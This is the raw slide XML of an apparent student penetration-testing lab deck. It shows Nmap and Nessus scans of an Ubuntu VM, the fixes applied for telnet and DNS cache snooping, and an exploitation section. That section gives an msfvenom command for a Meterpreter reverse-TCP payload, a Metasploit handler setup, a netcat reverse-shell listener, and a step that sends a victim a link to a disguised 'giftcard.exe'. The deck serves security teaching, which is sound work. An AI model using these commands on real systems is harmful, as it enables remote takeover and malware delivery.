              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C7056E-EE53-419D-968C-F3100D08BDDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622852" y="649357"/>
            <a:ext cx="8890575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we converted our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.152.138/giftcard.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21522547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B7F5D5-C0A3-406F-A9EB-50448A71C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217" y="2032345"/>
            <a:ext cx="5676900" cy="2581275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010CF1F5-D6D8-42B6-BD5B-07ECCD97E13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201217" y="1444487"/>
            <a:ext cx="11990783" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we send our link to our victim, now whenever the victim clicks on the link our file will be downloaded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18095856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E54169-70A5-4B27-8A89-35A28754396A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848139" y="1590261"/>
            <a:ext cx="2271776" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C082D107-D619-4DE6-A4EE-91F712C55205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848139" y="2228671"/>
            <a:ext cx="11039061" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration testing, or ethical hacking, is a proactive approach to identifying and fixing security vulnerabilities before malicious actors exploit them. In this presentation, we will explore the importance of penetration testing, its methodologies, and real-world examples, highlighting its critical role in safeguarding digital assets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417087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65" y="177353"/>
            <a:ext cx="5972175" cy="18669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65" y="2250986"/>
            <a:ext cx="6010275" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6465194" y="888641"/>
            <a:ext cx="5475015" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, let us start a Netcat listener for a reverse shell using the following command.nc –lvp 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3973895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4105" y="562968"/>
            <a:ext cx="5873274" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Install Apache server and allow it on Ubuntu's firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ufw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131847" y="5079788"/>
            <a:ext cx="4651145" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We setup a SSH connection from Kali to Ubuntu</a:t>
            </a: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258492" y="1098281"/>
            <a:ext cx="5524500" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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6959826" y="3948732"/>
            <a:ext cx="4961719" cy="2631445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6222F78B-E0DF-4D78-81E9-21E0E6D0C26D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258492" y="110646"/>
            <a:ext cx="994183" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ubuntu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2785128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0456" y="25758"/>
            <a:ext cx="7028142" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To verify that the SSH connection is established we run the command ls-l </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70456" y="472363"/>
            <a:ext cx="5867400" cy="2550557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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55" y="3863192"/>
            <a:ext cx="5541513" cy="2994807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270455" y="3309870"/>
            <a:ext cx="2331536" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We install Bind9 server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058243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89" y="334850"/>
            <a:ext cx="7378879" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We scanned the target machine using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and we got the following output</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28789" y="981181"/>
            <a:ext cx="7378879" cy="4196126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128789" y="5293216"/>
            <a:ext cx="3343479" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The open ports are up and shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87761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89" y="103031"/>
            <a:ext cx="4426148" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We scan using Nessus to scan vulnerabilities</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47099" y="472362"/>
            <a:ext cx="8739323" cy="4395852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147100" y="5009882"/>
            <a:ext cx="9375819" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It seems like the scan has identified a number of vulnerabilities on the target system, categorized by their severity levels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2154645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200694" y="1190445"/>
            <a:ext cx="7629661" cy="4077014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="97663" y="204383"/>
            <a:ext cx="10753859" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nessus scan has indicated that ubuntu is running telnet server over an unencrypted channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which is a medium severity issue due to the risk of sensitive information being transmitted in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clear text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200694" y="5473521"/>
            <a:ext cx="8834907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a solution we disabled telnet and enabled instead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3807010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06249" y="1385486"/>
            <a:ext cx="7183191" cy="4150615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106249" y="185157"/>
            <a:ext cx="12099235" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The vulnerability identified, "DNS Server Cache Snooping Remote Information Disclosure," is a medium severity issue. It involves the potential for an attacker to determine what external domains have been recently queried through your DNS server, which can lead to privacy concerns and potentially aid in further attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106249" y="5640945"/>
            <a:ext cx="10654516" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a solution we configured the DNS server to not respond to non-Recursive Queries from outside the network,  this prevents external </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>actirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from being able to snoop on DNA  cache.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0354EB-4B37-416A-89D7-ED630C9249CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500109" y="1385486"/>
            <a:ext cx="2943225" cy="1552575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22763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304" y="128789"/>
            <a:ext cx="1868910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting Ubuntu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280172" y="498121"/>
            <a:ext cx="10087698" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 1: Generate the payload by running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command on Kali : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> LHOST=192.168.6.1 LPORT=4444 -f elf &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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172" y="1302041"/>
            <a:ext cx="6219825" cy="1781175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280172" y="3240805"/>
            <a:ext cx="4757841" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 2 : Transfer the payload to the target via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280172" y="3610137"/>
            <a:ext cx="11911828" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 3 : Set up a listener. Then, set up the handler : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set LHOST 192.168.6.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exploit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2421" y="4291601"/>
            <a:ext cx="6181725" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213026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547" y="90152"/>
            <a:ext cx="11073964" cy="926346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ready to Receive the Connection: After setting up the handler with these commands, it will wait for the reverse connection. Once the payload (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is executed on the target machine, a connection should be made to your Kali machine, and a Meterpreter session will be opened.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578" y="1016498"/>
            <a:ext cx="11151096" cy="4457023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433609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668" y="90152"/>
            <a:ext cx="11061085" cy="953596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command shell session 1 opened" means that your basic reverse shell payload was successfully executed on the target Ubuntu machine and has established a connection back to your Metasploit handler.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8" y="1097934"/>
            <a:ext cx="4327301" cy="283064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530" y="1043749"/>
            <a:ext cx="5443470" cy="284620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417" y="3967194"/>
            <a:ext cx="5603585" cy="2890806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
